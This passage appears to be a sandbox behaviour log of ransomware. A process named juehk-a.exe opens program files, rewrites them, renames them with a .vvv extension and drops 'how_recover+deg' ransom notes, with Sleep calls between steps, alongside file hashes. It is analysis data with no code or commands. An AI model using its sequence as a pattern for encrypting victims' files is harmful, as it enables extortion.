- value: C:\Program Files\7-Zip\Lang\th.txt
- filesize: 24542
- md5sum: ed8808fdafcd013866e421c673548432
- sha1sum: 5a1904778d5a5c9a75983246df3dfd7ac56787b8
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519784
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70908
- mode: rename
- sequenceNumber: 939
- filesize: 24542
- md5sum: ed8808fdafcd013866e421c673548432
- sha1sum: 5a1904778d5a5c9a75983246df3dfd7ac56787b8
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\th.txt
- new_name: C:\Program Files\7-Zip\Lang\th.txt.vvv
- ads:
- fid (ads:): 562949953519784
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70913
- mode: open
- sequenceNumber: 940
- value: C:\Program Files\7-Zip\Lang\tr.txt
- filesize: 13497
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519785
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70920
- mode: close
- sequenceNumber: 941
- value: C:\Program Files\7-Zip\Lang\tr.txt
- filesize: 13918
- md5sum: f2d52642c65b02bf46067ac2dedcb375
- sha1sum: fdeb9f92cc7f932dddd01c6e3952c6b285ff24ce
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519785
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70927
- mode: rename
- sequenceNumber: 942
- filesize: 13918
- md5sum: f2d52642c65b02bf46067ac2dedcb375
- sha1sum: fdeb9f92cc7f932dddd01c6e3952c6b285ff24ce
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\tr.txt
- new_name: C:\Program Files\7-Zip\Lang\tr.txt.vvv
- ads:
- fid (ads:): 562949953519785
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70934
- mode: open
- sequenceNumber: 943
- value: C:\Program Files\7-Zip\Lang\tt.txt
- filesize: 18409
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519786
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70942
- mode: close
- sequenceNumber: 944
- value: C:\Program Files\7-Zip\Lang\tt.txt
- filesize: 18830
- md5sum: 6492f298761c9676c622d87791cf9067
- sha1sum: 7264314a4480a804931651f6b70905c97d978017
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519786
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70950
- mode: rename
- sequenceNumber: 945
- filesize: 18830
- md5sum: 6492f298761c9676c622d87791cf9067
- sha1sum: 7264314a4480a804931651f6b70905c97d978017
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\tt.txt
- new_name: C:\Program Files\7-Zip\Lang\tt.txt.vvv
- ads:
- fid (ads:): 562949953519786
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70956
- mode: open
- sequenceNumber: 946
- value: C:\Program Files\7-Zip\Lang\ug.txt
- filesize: 18785
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519787
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 70961
- mode: close
- sequenceNumber: 947
- value: C:\Program Files\7-Zip\Lang\ug.txt
- filesize: 19214
- md5sum: 1991c9cb3111cf2dc9131d1664c7ff73
- sha1sum: b3cb513cbad2b375195fedb402f47fe4d4050e96
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519787
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 70970
- mode: rename
- sequenceNumber: 948
- filesize: 19214
- md5sum: 1991c9cb3111cf2dc9131d1664c7ff73
- sha1sum: b3cb513cbad2b375195fedb402f47fe4d4050e96
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\ug.txt
- new_name: C:\Program Files\7-Zip\Lang\ug.txt.vvv
- ads:
- fid (ads:): 562949953519787
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71003
- mode: open
- sequenceNumber: 949
- value: C:\Program Files\7-Zip\Lang\uk.txt
- filesize: 19729
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519788
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71038
- mode: close
- sequenceNumber: 950
- value: C:\Program Files\7-Zip\Lang\uk.txt
- filesize: 20158
- md5sum: f1713b385ee387166aa27f5ef7282183
- sha1sum: fb0542b9cf7e450d5a751d93e1a49ae703a09c47
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519788
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71123
- mode: rename
- sequenceNumber: 951
- filesize: 20158
- md5sum: f1713b385ee387166aa27f5ef7282183
- sha1sum: fb0542b9cf7e450d5a751d93e1a49ae703a09c47
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\uk.txt
- new_name: C:\Program Files\7-Zip\Lang\uk.txt.vvv
- ads:
- fid (ads:): 562949953519788
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71153
- mode: open
- sequenceNumber: 952
- value: C:\Program Files\7-Zip\Lang\uz.txt
- filesize: 10679
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519789
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71304
- mode: close
- sequenceNumber: 953
- value: C:\Program Files\7-Zip\Lang\uz.txt
- filesize: 11102
- md5sum: e994144044b7bdb75ec5ccd49c74e09c
- sha1sum: 1ad8330f0032649348fc479b4ef0d7455986ccb5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519789
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71461
- mode: rename
- sequenceNumber: 954
- filesize: 11102
- md5sum: e994144044b7bdb75ec5ccd49c74e09c
- sha1sum: 1ad8330f0032649348fc479b4ef0d7455986ccb5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\uz.txt
- new_name: C:\Program Files\7-Zip\Lang\uz.txt.vvv
- ads:
- fid (ads:): 562949953519789
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71495
- mode: open
- sequenceNumber: 955
- value: C:\Program Files\7-Zip\Lang\va.txt
- filesize: 12179
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519790
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71520
- mode: close
- sequenceNumber: 956
- value: C:\Program Files\7-Zip\Lang\va.txt
- filesize: 12606
- md5sum: c17927f5c43d6ae60befd021ac5566c7
- sha1sum: 000e2b8a1e76cd9f75daa4283f67d1a729be44cf
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519790
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71528
- mode: rename
- sequenceNumber: 957
- filesize: 12606
- md5sum: c17927f5c43d6ae60befd021ac5566c7
- sha1sum: 000e2b8a1e76cd9f75daa4283f67d1a729be44cf
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\va.txt
- new_name: C:\Program Files\7-Zip\Lang\va.txt.vvv
- ads:
- fid (ads:): 562949953519790
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71534
- mode: open
- sequenceNumber: 958
- value: C:\Program Files\7-Zip\Lang\vi.txt
- filesize: 13716
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519791
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 71594
- repeat: 400
- sequenceNumber: 959
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 71615
- mode: close
- sequenceNumber: 960
- value: C:\Program Files\7-Zip\Lang\vi.txt
- filesize: 14142
- md5sum: fe7477c6f271ccee7efb0b4e7dc29802
- sha1sum: aefa1b497fb4c04691ebf56499e171c2fed0e7c0
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519791
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71621
- mode: rename
- sequenceNumber: 961
- filesize: 14142
- md5sum: fe7477c6f271ccee7efb0b4e7dc29802
- sha1sum: aefa1b497fb4c04691ebf56499e171c2fed0e7c0
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\vi.txt
- new_name: C:\Program Files\7-Zip\Lang\vi.txt.vvv
- ads:
- fid (ads:): 562949953519791
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71678
- mode: open
- sequenceNumber: 962
- value: C:\Program Files\7-Zip\Lang\zh-cn.txt
- filesize: 13000
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519792
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71691
- mode: close
- sequenceNumber: 963
- value: C:\Program Files\7-Zip\Lang\zh-cn.txt
- filesize: 13422
- md5sum: 76cba679241960daf782ad9456d6218a
- sha1sum: 2c3085f7a69db80a775439c2f302401b5443faa8
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519792
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71714
- mode: rename
- sequenceNumber: 964
- filesize: 13422
- md5sum: 76cba679241960daf782ad9456d6218a
- sha1sum: 2c3085f7a69db80a775439c2f302401b5443faa8
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\zh-cn.txt
- new_name: C:\Program Files\7-Zip\Lang\zh-cn.txt.vvv
- ads:
- fid (ads:): 562949953519792
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71722
- mode: open
- sequenceNumber: 965
- value: C:\Program Files\7-Zip\Lang\zh-tw.txt
- filesize: 13087
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519793
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71730
- mode: close
- sequenceNumber: 966
- value: C:\Program Files\7-Zip\Lang\zh-tw.txt
- filesize: 13502
- md5sum: fea28ced4cd01dfffe18af0ad321c152
- sha1sum: 2441e839d3a498ca7c8c5ae97ec9ab63cc59007a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519793
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71738
- mode: rename
- sequenceNumber: 967
- filesize: 13502
- md5sum: fea28ced4cd01dfffe18af0ad321c152
- sha1sum: 2441e839d3a498ca7c8c5ae97ec9ab63cc59007a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\Lang\zh-tw.txt
- new_name: C:\Program Files\7-Zip\Lang\zh-tw.txt.vvv
- ads:
- fid (ads:): 562949953519793
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71751
- mode: created
- sequenceNumber: 968
- value: C:\Program Files\7-Zip\Lang\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930148780
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71754
- mode: close
- sequenceNumber: 969
- value: C:\Program Files\7-Zip\Lang\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930148780
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71759
- mode: created
- sequenceNumber: 970
- value: C:\Program Files\7-Zip\Lang\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883570130
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71763
- mode: close
- sequenceNumber: 971
- value: C:\Program Files\7-Zip\Lang\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883570130
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71767
- mode: open
- sequenceNumber: 972
- value: C:\Program Files\7-Zip\License.txt
- filesize: 1927
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519711
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71832
- mode: close
- sequenceNumber: 973
- value: C:\Program Files\7-Zip\License.txt
- filesize: 2350
- md5sum: 57a9d6d0d6863848aaf0e35dcaadafa5
- sha1sum: bd0330ea19d6b8ecf7546850dc79d03006d598fe
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519711
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71838
- mode: rename
- sequenceNumber: 974
- filesize: 2350
- md5sum: 57a9d6d0d6863848aaf0e35dcaadafa5
- sha1sum: bd0330ea19d6b8ecf7546850dc79d03006d598fe
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\License.txt
- new_name: C:\Program Files\7-Zip\License.txt.vvv
- ads:
- fid (ads:): 562949953519711
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71845
- mode: open
- sequenceNumber: 975
- value: C:\Program Files\7-Zip\readme.txt
- filesize: 1565
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519712
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 71850
- repeat: 500
- sequenceNumber: 976
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 71994
- mode: close
- sequenceNumber: 977
- value: C:\Program Files\7-Zip\readme.txt
- filesize: 1982
- md5sum: e97e45c104f03321d4981d30e4b951a8
- sha1sum: d14fd3487d0103d07469b38d8f64dc32f5d3363c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953519712
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 72040
- repeat: 600
- sequenceNumber: 978
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 72049
- mode: rename
- sequenceNumber: 979
- filesize: 1982
- md5sum: e97e45c104f03321d4981d30e4b951a8
- sha1sum: d14fd3487d0103d07469b38d8f64dc32f5d3363c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\7-Zip\readme.txt
- new_name: C:\Program Files\7-Zip\readme.txt.vvv
- ads:
- fid (ads:): 562949953519712
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72125
- mode: created
- sequenceNumber: 980
- value: C:\Program Files\7-Zip\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906859511
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72131
- mode: close
- sequenceNumber: 981
- value: C:\Program Files\7-Zip\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906859511
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72139
- mode: created
- sequenceNumber: 982
- value: C:\Program Files\7-Zip\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930154113
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72143
- mode: close
- sequenceNumber: 983
- value: C:\Program Files\7-Zip\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930154113
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72235
- mode: created
- sequenceNumber: 984
- value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930155988
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72241
- mode: close
- sequenceNumber: 985
- value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930155988
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72260
- mode: created
- sequenceNumber: 986
- value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953479374
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72266
- mode: close
- sequenceNumber: 987
- value: C:\Program Files\Common Files\DESIGNER\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953479374
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72272
- mode: created
- sequenceNumber: 988
- value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930212990
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72278
- mode: close
- sequenceNumber: 989
- value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930212990
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72287
- mode: created
- sequenceNumber: 990
- value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930212992
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72294
- mode: close
- sequenceNumber: 991
- value: C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930212992
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72300
- mode: created
- sequenceNumber: 992
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3377699720608905
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72306
- mode: close
- sequenceNumber: 993
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 3377699720608905
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72313
- mode: created
- sequenceNumber: 994
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 4503599627451537
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 72343
- repeat: 700
- sequenceNumber: 995
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- apicall:
- timestamp: 72509
- repeat: 800
- sequenceNumber: 996
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 72577
- mode: close
- sequenceNumber: 997
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 4503599627451537
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72583
- mode: created
- sequenceNumber: 998
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813766313
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72588
- mode: close
- sequenceNumber: 999
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813766313
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 72593
- mode: created
- sequenceNumber: 1000
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813766357
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 72598
- mode: close
- sequenceNumber: 1001
- value: C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
